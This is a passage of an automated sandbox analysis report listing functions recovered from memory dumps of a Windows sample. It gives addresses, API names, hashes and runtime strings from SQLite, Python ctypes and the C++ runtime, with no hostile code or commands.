                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: delete$insert$replace$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-310407209
                                                                                                                                                                                                                                                                    • Opcode ID: 87ce0f707e7b577581722ad4a1387b3fcf2372f05e968d437b2cc0f1fadbe2c8
                                                                                                                                                                                                                                                                    • Instruction ID: 78da3ed84200d8cdba49c0a14b1fc7d445d2c1c4fca622b4207274e5236a8d35
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87ce0f707e7b577581722ad4a1387b3fcf2372f05e968d437b2cc0f1fadbe2c8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7115BE0B0CB1391FA249B76E848B792296AF45FC0F4440B6CD0D87B94EF2CE6478351
                                                                                                                                                                                                                                                                    Function 00007FFB0C032CE0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1404302391
                                                                                                                                                                                                                                                                    • Opcode ID: 5ae81091e86e25a5368a2a49817f595d8c0bef1ad97d726da483eeb57a43f45b
                                                                                                                                                                                                                                                                    • Instruction ID: 61ad898ff7a1e89345e04de3a076b005ace9d89001a8dc87e6b8b8123864d1db
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae81091e86e25a5368a2a49817f595d8c0bef1ad97d726da483eeb57a43f45b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF19CE1A0DA4286FA649B35E898B7933A9BF40F90F584135DA4D473A5EF3CE446C34C
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A7220 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 172COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C058
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.
                                                                                                                                                                                                                                                                    • API String ID: 3574868227-2922342969
                                                                                                                                                                                                                                                                    • Opcode ID: 35545b6d8455ecd6957b139098b76e7acc93c7997bf4f99056b34d33aed98f76
                                                                                                                                                                                                                                                                    • Instruction ID: 91c2c53d913a2186a693a6dcda94a324950cdd101254569d57969d45f8a4fc2a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35545b6d8455ecd6957b139098b76e7acc93c7997bf4f99056b34d33aed98f76
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE8127F6A09A02C6EB149F75E45CA7833A0FF85B89F1444B2CA0E476A4DF3DE586C340
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FDBBC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Free$String$ErrorFromInfoLocalProg
                                                                                                                                                                                                                                                                    • String ID: iu(uuuiu)
                                                                                                                                                                                                                                                                    • API String ID: 3403921354-1877708109
                                                                                                                                                                                                                                                                    • Opcode ID: 379d610efde80aea7e25e5220ffef6de210be6735cddb587e3987a17ea792276
                                                                                                                                                                                                                                                                    • Instruction ID: 831989f6d2b9ac0a7ab43973e9492a9acd1e1011dd706f97e54295d77df4b06c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 379d610efde80aea7e25e5220ffef6de210be6735cddb587e3987a17ea792276
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9151DB66B15E058AEB009F76E4643AC2371FB99F99F009136DE0E57B68DF38D509C350
                                                                                                                                                                                                                                                                    Function 00007FFB1C2556A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255729
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255737
                                                                                                                                                                                                                                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255750
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255762
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C2557D0
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C2557DC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 916704608-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                                                                                    • Instruction ID: 14e55b0c4373c053991d7ab6004b6431744ed81d3d332738868a50518e7ee7ba
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31D4E1A1AE51D7EE15EB22E8085F623A6BF05B70F690134DD6D47390EF3CE9448390
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FA6F0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                                                                    • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                                                                                    • API String ID: 190572456-3856192562
                                                                                                                                                                                                                                                                    • Opcode ID: f689fd5eb29f4f531bea3e8f6701307ec7aded59f8a24d2646ab97d44f2a5c48
                                                                                                                                                                                                                                                                    • Instruction ID: 32be771c48c31120f7f379c792a325d603b09dc318c59774c366c32054fc776a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f689fd5eb29f4f531bea3e8f6701307ec7aded59f8a24d2646ab97d44f2a5c48
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E041E8A5A08E4281EF019B36E954178A3B2BF96FE4F44E036E90E47A74DE2CE5498300
                                                                                                                                                                                                                                                                    Function 00007FFB1B6F5C40 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: f9e726577427167b5b43ce498b76b1f83f193940dfb1d3710f816244ba1a3bcc
                                                                                                                                                                                                                                                                    • Instruction ID: ed6fda4aa68715e1d0425b6f94fcb4b6975149938045ef0b8b1b6488032699b1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e726577427167b5b43ce498b76b1f83f193940dfb1d3710f816244ba1a3bcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5381C1A1E09E0346FA509B75EC61279A693AF627A0F44F03DE90D477B6DE3CED458700
                                                                                                                                                                                                                                                                    Function 00007FFB1C2514BC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$AdjustPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1501936508-0
                                                                                                                                                                                                                                                                    • Opcode ID: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                                                                                    • Instruction ID: 8444b7d37d2d3e2aa39c8cc4856aa1b99be0eedf260270bb523b49ecb4e8b419
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551A7E1A09E4283EA65FBB4D04C5FA6396AF06BB4B395435CE4E06798CF3CDC418790
                                                                                                                                                                                                                                                                    Function 00007FFB1C2512D8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$AdjustPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1501936508-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
                                                                                                                                                                                                                                                                    • Instruction ID: 6f64d364f9d8d6768249aba0b0fc0111f170abd072965b7064455d3835543122
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0151C7E1A09E4293EA65BBB4D05C5FE6393AF42BA4F354435CE4E06B94DE6CDC41C390
                                                                                                                                                                                                                                                                    Function 00007FFB1C254CEA Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                                                                                                                    • API String ID: 3685223789-928371585
                                                                                                                                                                                                                                                                    • Opcode ID: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
                                                                                                                                                                                                                                                                    • Instruction ID: bab03b8d95b50f5617864459aa61acea1ced40a459a7b5d838b5599bbcbbd45a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 305181E6719E4693DA20EB35E4485FAA362FF45BA4F608431DA8D43764EE3CE905C390
                                                                                                                                                                                                                                                                    Function 00007FFB1C25D444 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: {for
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-864106941
                                                                                                                                                                                                                                                                    • Opcode ID: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
                                                                                                                                                                                                                                                                    • Instruction ID: 7863e8fe94c381ca9bf71de7a4a70f425ca43131a496c4fb450d802af4acccc0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED515CF2A08E81AAE711AF34D5483F933A2EB45768F948031EA4C47B99DF7CD955C390
                                                                                                                                                                                                                                                                    Function 00007FFB1C25CA04 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: NameName::atol
                                                                                                                                                                                                                                                                    • String ID: `template-parameter$void
                                                                                                                                                                                                                                                                    • API String ID: 2130343216-4057429177
                                                                                                                                                                                                                                                                    • Opcode ID: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                                                                                    • Instruction ID: 6707c24fbb925f15de28f962863be66482dc7fc769f2c6e3cc0fb60fc85f074f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4159E2B08F528AFB00EBB4D8582ED2372BB19BA4F641135DE4C57795EF78A545C380
                                                                                                                                                                                                                                                                    Function 00007FFB1C2575D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-2211150622
                                                                                                                                                                                                                                                                    • Opcode ID: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                                                                                    • Instruction ID: a709e2cd2107991671dd991871d510489097f919fde36871e94fc2a77fb2df95
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C74138F2E18F928AF701AB78D8482F937A2BB05718F644431DA4C16394DF7CA944C790
                                                                                                                                                                                                                                                                    Function 00007FFB1C259554 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
